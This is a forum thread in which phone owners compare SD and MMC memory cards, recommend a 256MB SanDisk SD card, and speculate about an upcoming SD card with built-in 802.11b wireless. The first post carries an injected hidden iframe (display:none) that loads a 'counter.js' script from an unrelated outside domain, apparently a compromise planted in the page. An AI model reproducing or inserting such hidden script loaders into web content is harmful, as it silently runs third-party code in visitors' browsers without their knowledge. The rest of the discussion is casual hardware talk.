SD or MMC -which works/ is best?

I have seen posts of folks using both types. Is there a preference or do both work the same way?

I'm looking at getting a 256SanDisk SD card - just want to make sure it will work.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't know really of the technical differences between MMC/SD. However, I'm using the 256MB SanDisk SD card and it works great! I've loaded it down with MP3's, home movies (using TealMovie), pictures, apps. and all kinds of stuff.

If wireless (802.11b) connectivity is something you may be interested in and you can wait a few months, SanDisk will be releasing an integrated 802.11b+256MB SD card. I couldn't wait and will likely buy the integrated card one it's available. Anyway, just wanted to let you know incase it's helpful to you ...

SD256 =COMBO

Excellent News - I will pick up 1 256SD card for now and keep my eyes out for the COMBO - 802.11 would be super nice on this unit.

Thx.

Not to sound to foolish about this stuff, but what would you do with 802.11 incorporated into the SD card?

You might want to look into buying an SD card reader for you desktop. Trying to transfer through the phone takes far longer. The one that seems most popular is the Sandisk Cruzer (which you can buy with a 256 MB card).

I imagine you would get fast internet access (or network access) in the wifi environment without burning up your minutes on Verizon or EN with the card (similar to how I use my 802.11 card on my laptop.

Then again, when I'm near or in one of my wireless network areas (both home and office) I have a laptop plugged in!

The MMC and SD cards are pretty much the same physical size although my 256mb SanDisk SD card is thicker than my generic 128mb MMC card. The SD card also has to extra contacts on each side as well as a lock control to make the card read only.

I've been told that you can't put MP3s onto an MMC card but I have done that with no problem and used it in my 7135. There is supposed to be some security features in the SD card that are different than the MMC card but they both have some security.

MMC cards seem to have stopped increasing in MB as well and that may be part of the difference.

A reason for having combination 802.11b wireless connectivity is that you may be able to surf the net or get e-mail and download to the card instead of the limited memory on the phone. Also more and more places, like coffee houses, schools, bars, libraries, as well as individuals are offering wireless access to customers or visitors.

There is a whole network of wireless access points available to people on the go.

Of course we have to wait and see what our 7135 can do with all of this.
